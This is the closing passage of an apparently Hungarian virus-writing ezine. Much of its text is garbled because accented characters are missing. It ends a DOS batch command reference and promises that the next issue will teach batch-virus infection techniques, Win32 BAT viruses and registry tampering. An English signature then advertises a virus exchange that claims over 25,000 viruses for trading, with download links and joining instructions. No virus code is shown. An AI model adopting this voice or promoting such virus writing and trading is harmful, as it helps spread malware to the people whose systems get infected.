      hasznlatval).
      CHCPAz aktv kdlap szmnak megjelentse vagy belltsa

      CHCP [nnn]

      nnn A kdlapszm megadsa

      A CHCP paramter nlkli bersakor az aktv kdlapszm kerl kirsra.
      LFNFORHossz fjlneveket engedlyez vagy tilt FOR parancsok
      feldolgozsakor.

      LFNFOR [ON | OFF]

      Az aktulis bellts megjelentshez rd be az LFNFOR parancsot
      paramterek nlkl.
      BREAKA kiterjesztett CTRL+C ellenrzs belltsa vagy trlse.

      BREAK [ON | OFF]

      A BREAK aktulis belltsnak megjelentshez rd be paramter nlkl a
      BREAK parancsot.






MRA ENNYI...
Ha kvncsiak vagytok a folytatsra, a kvetkez&otilde; ezine-ben jabb fert&otilde;zsi
technikkkal ismerkedhettek meg. Megtanulhatjtok tovbb a WIN32-es BAT vrusok
mkdst, a regisztrcis adatbzis matatst BAT-bl, s beleszagolunk egy
kicsit az id&otilde;ztsbe. Illetve  megtanuljuk, hogyan rhatunk valban profi, mr
nem tisztn BAT vrust, mely mr olyan tulajdonsgokkal rendelkezik, mint egy
DOS-os vrus, vagyis DOS-os vrusok implementlsa BAT-ba. (A kvetkez lesz a
legjobb rsz.) s termszetesen jabb parancsokat is megismerhettek. Profik
lesznk a vgre gyerekek, nekem elhihetitek... Krs krds, panasz, haj,
shaj, a sajtkszts virii-k, meg brmi miatt rjatok a postmba. A cmem ITT
tallhat.





Ksztette : Black Cat

BCAT_H@YAHOO.COM            HTTP://JUMP.TO/BCVES
The Black Cat Virus Exchange System
More than 25000 virii for trading.

He is a virus trader/writer and member of the FCF (Formater's Cracking Force).
The FCF can be reached via http://jump.to/fcf
Interested in further developments and updates? Visit the Black Cat Virus Exchange System!
Black Cat's logs can d/led via: http://bcves.jump.to/bclogs.rar
Black Cat's trading page can be found: http://bcves.jump.to/trading.htm

The Virus Sorter New Generation COMPLETE PACKAGE can be downloaded via: http://bcves.jump.to/vsng.rar
The package contains the complete HELP and any additional files. (pictures, url shortcuts, etc.) Size: 140K
The Virus Sorter New Generation SIMPLE PACK can be downloaded via: http://bcves.jump.to/vsng.exe
D/L, and GO! Nothing to do with it! (not recommended for 1st time users) Size: 60K_
Would u like to trade? What are you waiting for?
The Black Cat Virus Exchange System provides a powerfull, and completely free home of trading, and traders. Would u like to be a member? Would u like a trading page at BCVES? Would you like to meet other 
traders? Would you like yourself to be distributed with this (vsng complete) package? In the URLS subdirectory all BCVES members' BCVES URL can be found as W9X Internet shortcut icons._
First, subscribe to the Black Cat Virus Exchange System's egroup (bcves-subscribe@egroups.com)
Than send a letter to Black Cat, with the following information:
- Name (nickname)
- A short message (optional)
- The place (URL) of your logs
- The place (URL) of your log statistics
- The place (URL) of your PGP key (optional)
- Your email address
And that's all. After some day, you'll be up. Why to choose BCVES? More than 150 visitors a week. :)
Do you need privacy? D/l the BCVES's PGP key (http://bcves.jump.to/bcves.asc)
Would you like to use PGP when writing to Black Cat? PGP can be found here (http://bcves.jump.to/blackcat.asc)!_
HAPPY TRADING!!